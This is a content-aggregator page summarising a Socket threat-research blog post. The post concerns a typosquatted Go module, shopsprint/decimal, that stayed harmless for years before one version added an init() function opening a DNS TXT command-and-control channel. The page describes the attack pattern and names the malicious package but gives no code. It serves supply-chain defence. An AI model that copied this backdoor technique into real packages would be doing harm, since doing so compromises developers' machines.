Home / Companies / Socket / Blog / Post Details
Content Deep Dive

Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor

Blog post from Socket

Post Details
Company
Date Published
Author
Kush Pandya
Word Count
2,564
Company Posts That Month
27
Language
English
Hacker News Points
-
Summary

Socket's Threat Research Team discovered a malicious Go module, github.com/shopsprint/decimal, which is a typosquat of the legitimate github.com/shopspring/decimal library used for arbitrary precision arithmetic in the Go ecosystem. This malicious module was weaponized on August 19, 2023, with version v1.3.3 introducing a harmful init() function that opens a DNS TXT record command-and-control channel to a threat actor's subdomain. Although the GitHub repository and owner account for shopsprint have been removed, the malicious version is still accessible through proxy.golang.org. The attack uses a "trust-then-poison" pattern, where the module appeared benign for years before being weaponized. The malicious code, which can execute arbitrary commands on affected machines, exploits Go's package initialization to run in the background without user-visible output. The persistence of this threat is facilitated by Go's reproducibility model, which caches module artifacts indefinitely. This incident highlights the vulnerabilities in software supply chains, particularly through typosquatting, and underscores the importance of vigilant dependency management and security practices in development environments.

Trends Found in this Post
Trend Post Mentions Total Month Mentions Posts Companies MoM
AI Coding Assistant 2 1,798 527 167 +21%
MCP 1 7,098 726 186 +16%
Secrets Management 1 2,152 360 101 +18%